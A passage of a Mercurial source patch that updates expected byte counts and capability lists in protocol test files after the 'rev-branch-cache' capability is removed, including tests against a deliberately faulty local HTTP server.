bundle2-output: closing payload chunk bundle2-output: bundle part: "check:bookmarks" bundle2-output-part: "check:bookmarks" 23 bytes payload @@ -275,9 +275,9 @@ bundle2-input: part parameters: 0 bundle2-input: found a handler for part replycaps bundle2-input-part: "replycaps" supported - bundle2-input: payload chunk size: 241 + bundle2-input: payload chunk size: 224 bundle2-input: payload chunk size: 0 - bundle2-input-part: total payload size 241 + bundle2-input-part: total payload size 224 bundle2-input: part header size: 22 bundle2-input: part type: "CHECK:BOOKMARKS" bundle2-input: part id: "1" diff --git a/tests/test-clone-uncompressed.t b/tests/test-clone-uncompressed.t --- a/tests/test-clone-uncompressed.t +++ b/tests/test-clone-uncompressed.t @@ -73,7 +73,6 @@ remote-changegroup http https - rev-branch-cache $ hg clone --stream -U http://localhost:$HGPORT server-disabled warning: stream clone requested but server has them disabled @@ -141,7 +140,6 @@ remote-changegroup http https - rev-branch-cache $ hg clone --stream -U http://localhost:$HGPORT server-disabled warning: stream clone requested but server has them disabled diff --git a/tests/test-clonebundles.t b/tests/test-clonebundles.t --- a/tests/test-clonebundles.t +++ b/tests/test-clonebundles.t @@ -589,9 +589,7 @@ bundle2-input-part: "listkeys" (params: 1 mandatory) supported bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 - bundle2-input-part: "cache:rev-branch-cache" (advisory) supported - bundle2-input-part: total payload size 59 - bundle2-input-bundle: 4 parts total + bundle2-input-bundle: 3 parts total checking for updated bookmarks updating the branch cache added 2 changesets with 2 changes to 2 files diff --git a/tests/test-debugcommands.t b/tests/test-debugcommands.t --- a/tests/test-debugcommands.t +++ b/tests/test-debugcommands.t @@ -636,7 +636,6 @@ remote-changegroup http https - rev-branch-cache stream v2 @@ -654,7 +653,7 @@ devel-peer-request: pairs: 81 
bytes sending hello command sending between command - remote: 463 + remote: 444 remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash remote: 1 devel-peer-request: protocaps diff --git a/tests/test-http-bad-server.t b/tests/test-http-bad-server.t --- a/tests/test-http-bad-server.t +++ b/tests/test-http-bad-server.t @@ -118,17 +118,17 @@ readline(115 from *) -> (*) host: localhost:$HGPORT\r\n (glob) readline(* from *) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(* from *) -> (2) \r\n (glob) - sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) 
+ sendall(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) write(36) -> HTTP/1.1 200 Script output follows\r\n (no-py3 !) write(23) -> Server: badhttpserver\r\n (no-py3 !) write(37) -> Date: $HTTP_DATE$\r\n (no-py3 !) write(41) -> Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21) -> Content-Length: 450\r\n (no-py3 !) + write(21) -> Content-Length: 431\r\n (no-py3 !) write(2) -> \r\n (no-py3 !) - write(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + write(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(4? from 65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n (glob) readline(1? from *) -> (1?) 
Accept-Encoding* (glob) read limit reached; closing socket @@ -163,17 +163,17 @@ readline(213 from *) -> (*) host: localhost:$HGPORT\r\n (glob) readline(* from *) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(* from *) -> (2) \r\n (glob) - sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) 
+ write(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) write(36) -> HTTP/1.1 200 Script output follows\r\n (no-py3 !) write(23) -> Server: badhttpserver\r\n (no-py3 !) write(37) -> Date: $HTTP_DATE$\r\n (no-py3 !) write(41) -> Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21) -> Content-Length: 450\r\n (no-py3 !) + write(21) -> Content-Length: 431\r\n (no-py3 !) write(2) -> \r\n (no-py3 !) - write(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + write(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(13? from 65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n (glob) readline(1?? from *) -> (27) Accept-Encoding: identity\r\n (glob) readline(8? from *) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) @@ -228,17 +228,17 @@ readline(234 from *) -> (2?) host: localhost:$HGPORT\r\n (glob) readline(* from *) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(* from *) -> (2) \r\n (glob) - sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 463\r\n\r\n (py36 !) 
- sendall(463) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 463\r\n\r\n (py3 no-py36 !) - write(463) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 444\r\n\r\n (py36 !) + sendall(444) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 444\r\n\r\n (py3 no-py36 !) + write(444) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) write(36) -> HTTP/1.1 200 Script output follows\r\n (no-py3 !) write(23) -> Server: badhttpserver\r\n (no-py3 !) write(37) -> Date: $HTTP_DATE$\r\n (no-py3 !) write(41) -> Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21) -> Content-Length: 463\r\n (no-py3 !) 
+ write(21) -> Content-Length: 444\r\n (no-py3 !) write(2) -> \r\n (no-py3 !) - write(463) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + write(444) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(1?? from 65537) -> (27) POST /?cmd=batch HTTP/1.1\r\n (glob) readline(1?? from *) -> (27) Accept-Encoding: identity\r\n (glob) readline(1?? from *) -> (41) content-type: application/mercurial-0.1\r\n (glob) @@ -296,7 +296,7 @@ Traceback (most recent call last): Exception: connection closed after sending N bytes - write(286) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\nHTTP/1.1 500 Internal Server Error\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nTransfer-Encoding: chunked\r\n\r\n (py3 no-py36 !) + write(286) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\nHTTP/1.1 500 Internal Server Error\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nTransfer-Encoding: chunked\r\n\r\n (py3 no-py36 !) write(36) -> HTTP/1.1 500 Internal Server Error\r\n (no-py3 !) 
$ rm -f error.log @@ -307,7 +307,7 @@ $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone - abort: HTTP request error (incomplete response; expected 450 bytes got 20) + abort: HTTP request error (incomplete response; expected 431 bytes got 20) (this may be an intermittent network failure; if the error persists, consider contacting the network or server operator) [255] @@ -320,17 +320,17 @@ readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(*) -> (2) \r\n (glob) - sendall(160 from 160) -> (20) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(20 from 450) -> (0) batch branchmap bund (py36 !) - write(160 from 160) -> (20) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(20 from 450) -> (0) batch branchmap bund (py3 no-py36 !) + sendall(160 from 160) -> (20) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(20 from 431) -> (0) batch branchmap bund (py36 !) + write(160 from 160) -> (20) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(20 from 431) -> (0) batch branchmap bund (py3 no-py36 !) write(36 from 36) -> (144) HTTP/1.1 200 Script output follows\r\n (no-py3 !) write(23 from 23) -> (121) Server: badhttpserver\r\n (no-py3 !) write(37 from 37) -> (84) Date: $HTTP_DATE$\r\n (no-py3 !) write(41 from 41) -> (43) Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21 from 21) -> (22) Content-Length: 450\r\n (no-py3 !) 
+ write(21 from 21) -> (22) Content-Length: 431\r\n (no-py3 !) write(2 from 2) -> (20) \r\n (no-py3 !) - write(20 from 450) -> (0) batch branchmap bund (no-py3 !) + write(20 from 431) -> (0) batch branchmap bund (no-py3 !) write limit reached; closing socket $LOCALIP - - [$ERRDATE$] Exception happened during processing request '/?cmd=capabilities': (glob) Traceback (most recent call last): @@ -341,7 +341,7 @@ Server sends incomplete headers for batch request - $ hg serve --config badserver.closeaftersendbytes=728 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=709 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS TODO this output is horrible @@ -363,17 +363,17 @@ readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(*) -> (2) \r\n (glob) - sendall(160 from 160) -> (568) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(450 from 450) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160 from 160) -> (568) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(450 from 450) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) - write(36 from 36) -> (692) HTTP/1.1 200 Script output follows\r\n (no-py3 !) 
- write(23 from 23) -> (669) Server: badhttpserver\r\n (no-py3 !) - write(37 from 37) -> (632) Date: $HTTP_DATE$\r\n (no-py3 !) - write(41 from 41) -> (591) Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21 from 21) -> (570) Content-Length: 450\r\n (no-py3 !) - write(2 from 2) -> (568) \r\n (no-py3 !) - write(450 from 450) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + sendall(160 from 160) -> (549) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(431 from 431) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160 from 160) -> (568) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(431 from 431) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + write(36 from 36) -> (673) HTTP/1.1 200 Script output follows\r\n (no-py3 !) + write(23 from 23) -> (650) Server: badhttpserver\r\n (no-py3 !) + write(37 from 37) -> (613) Date: $HTTP_DATE$\r\n (no-py3 !) + write(41 from 41) -> (572) Content-Type: application/mercurial-0.1\r\n (no-py3 !) + write(21 from 21) -> (551) Content-Length: 431\r\n (no-py3 !) + write(2 from 2) -> (549) \r\n (no-py3 !) 
+ write(431 from 431) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) @@ -401,7 +401,7 @@ Server sends an incomplete HTTP response body to batch request - $ hg serve --config badserver.closeaftersendbytes=793 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=774 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS TODO client spews a stack due to uncaught ValueError in batch.results() @@ -422,17 +422,17 @@ readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(*) -> (2) \r\n (glob) - sendall(160 from 160) -> (633) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(450 from 450) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160 from 160) -> (633) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(450 from 450) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) 
- write(36 from 36) -> (757) HTTP/1.1 200 Script output follows\r\n (no-py3 !) - write(23 from 23) -> (734) Server: badhttpserver\r\n (no-py3 !) - write(37 from 37) -> (697) Date: $HTTP_DATE$\r\n (no-py3 !) - write(41 from 41) -> (656) Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21 from 21) -> (635) Content-Length: 450\r\n (no-py3 !) - write(2 from 2) -> (633) \r\n (no-py3 !) - write(450 from 450) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + sendall(160 from 160) -> (614) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(431 from 431) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160 from 160) -> (633) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(431 from 431) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + write(36 from 36) -> (738) HTTP/1.1 200 Script output follows\r\n (no-py3 !) + write(23 from 23) -> (715) Server: badhttpserver\r\n (no-py3 !) + write(37 from 37) -> (678) Date: $HTTP_DATE$\r\n (no-py3 !) + write(41 from 41) -> (637) Content-Type: application/mercurial-0.1\r\n (no-py3 !) + write(21 from 21) -> (616) Content-Length: 431\r\n (no-py3 !) 
+ write(2 from 2) -> (614) \r\n (no-py3 !) + write(431 from 431) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) @@ -463,7 +463,7 @@ Server sends incomplete headers for getbundle response - $ hg serve --config badserver.closeaftersendbytes=940 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=921 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS TODO this output is terrible @@ -486,17 +486,17 @@ readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(*) -> (2) \r\n (glob) - sendall(160 from 160) -> (780) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(450 from 450) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160 from 160) -> (780) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(450 from 450) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) 
- write(36 from 36) -> (904) HTTP/1.1 200 Script output follows\r\n (no-py3 !) - write(23 from 23) -> (881) Server: badhttpserver\r\n (no-py3 !) - write(37 from 37) -> (844) Date: $HTTP_DATE$\r\n (no-py3 !) - write(41 from 41) -> (803) Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21 from 21) -> (782) Content-Length: 450\r\n (no-py3 !) - write(2 from 2) -> (780) \r\n (no-py3 !) - write(450 from 450) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + sendall(160 from 160) -> (761) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(431 from 431) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160 from 160) -> (780) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(431 from 431) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + write(36 from 36) -> (885) HTTP/1.1 200 Script output follows\r\n (no-py3 !) + write(23 from 23) -> (862) Server: badhttpserver\r\n (no-py3 !) + write(37 from 37) -> (825) Date: $HTTP_DATE$\r\n (no-py3 !) + write(41 from 41) -> (784) Content-Type: application/mercurial-0.1\r\n (no-py3 !) + write(21 from 21) -> (763) Content-Length: 431\r\n (no-py3 !) 
+ write(2 from 2) -> (761) \r\n (no-py3 !) + write(431 from 431) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) @@ -520,7 +520,7 @@ readline(65537) -> (30) GET /?cmd=getbundle HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) - readline(*) -> (461) x-hgarg-1: 